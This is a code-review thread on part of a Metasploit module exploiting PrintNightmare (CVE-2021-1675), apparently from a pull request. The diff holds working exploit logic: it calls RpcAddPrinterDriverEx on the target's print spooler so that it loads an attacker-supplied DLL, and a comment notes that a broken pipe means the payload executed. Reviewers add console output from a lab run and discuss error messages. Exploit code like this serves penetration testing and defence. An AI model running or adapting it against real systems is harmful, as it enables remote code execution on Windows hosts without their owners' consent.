modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb

```diff
@@ -0,0 +1,430 @@
+      level: 2,
+      tag: 2,
+      driver_info: PrintSystem::DriverInfo2.new(
+        c_version: 3,
+        p_name_ref_id: 0x00020000,
+        p_environment_ref_id: 0x00020004,
+        p_driver_path_ref_id: 0x00020008,
+        p_data_file_ref_id: 0x0002000c,
+        p_config_file_ref_id: 0x00020010,
+        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913
+        p_name: "#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}",
+        p_environment: environment,
+        p_driver_path: driver_path,
+        p_data_file: datastore['DLL_PATH'],
+        p_config_file: 'C:\\Windows\\System32\\kernel32.dll'
+      )
+    )
+
+    flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES
+    add_printer_driver_ex("\\\\#{datastore['RHOST']}", container, flags)
+
+    1.upto(3) do |directory|
+      container.driver_info.p_config_file.assign("#{config_directory}\\3\\old\\#{directory}\\#{filename}")
+      add_printer_driver_ex("\\\\#{datastore['RHOST']}", container, flags)
+    end
+  end
+
+  def enum_printer_drivers(environment)
+    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)
+    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)
+    DriverInfo2.read(response.p_drivers.referent.value.map(&:chr).join)
+  end
+
+  def get_printer_driver_directory(environment)
+    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)
+    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)
+    RubySMB::Field::Stringz16.read(response.p_driver_directory.referent.value.map(&:chr).join).encode('ASCII-8BIT')
+  end
+
+  def add_printer_driver_ex(name, container, flags)
+    begin
+      response = rprn_call('RpcAddPrinterDriverEx', p_name: name, p_driver_container: container, dw_file_copy_flags: flags)
+    rescue RubySMB::Error::UnexpectedStatusCode => e
+      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first
+      message = "Error #{nt_status.name} (#{nt_status.description})"
+      if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN
+        # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected
+        vprint_status(message)
+      else
+        print_error(message)
+      end
+
+      return
+    end
+
+    message = "RpcAddPrinterDriverEx response #{response.error_status}"
+    errors = ::WindowsError::Win32.find_by_retval(response.error_status.value)
+    unless errors.empty?
+      error = errors.first
+      message << " #{error.name} (#{error.description})"
+    end
+    vprint_status(message)
```

Comment:
Additional error handling needs to be performed here. If a user provides an inaccessible `DLL_PATH`, the module will fail with no message printed unless `VERBOSE` is enabled:
```
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.196

[*] 192.168.91.196:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.196:445 - Enumerating the installed printer drivers...
[*] Auxiliary module execution completed
```
With `VERBOSE` enabled, it looks like this: 
```
msf6 auxiliary(admin/dcerpc/cve_2021_1675_printnightmare) > run
[*] Running module against 192.168.91.196

[*] 192.168.91.196:445 - Target environment: Windows v10.0.17763 (x64)
[*] 192.168.91.196:445 - Binding to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.196[\spoolss] ...
[*] 192.168.91.196:445 - Bound to 12345678-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.91.196[\spoolss] ...
[*] 192.168.91.196:445 - Enumerating the installed printer drivers...
[*] 192.168.91.196:445 - Using driver path: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] 192.168.91.196:445 - Using directory: C:\Windows\system32\spool\DRIVERS\x64
[*] 192.168.91.196:445 - RpcAddPrinterDriverEx response 384
[*] 192.168.91.196:445 - RpcAddPrinterDriverEx response 3 ERROR_PATH_NOT_FOUND (The system cannot find the path specified.)
[*] 192.168.91.196:445 - RpcAddPrinterDriverEx response 3 ERROR_PATH_NOT_FOUND (The system cannot find the path specified.)
[*] 192.168.91.196:445 - RpcAddPrinterDriverEx response 3 ERROR_PATH_NOT_FOUND (The system cannot find the path specified.)
[*] Auxiliary module execution completed
```

Reply:
Well the error is handled in this case, there's no stack trace and the module continues to execute as normal. It probably makes sense though to print the error message even when `VERBOSE` is disabled.

Reply:
You're right, I just meant to make sure error messages like this are always printed.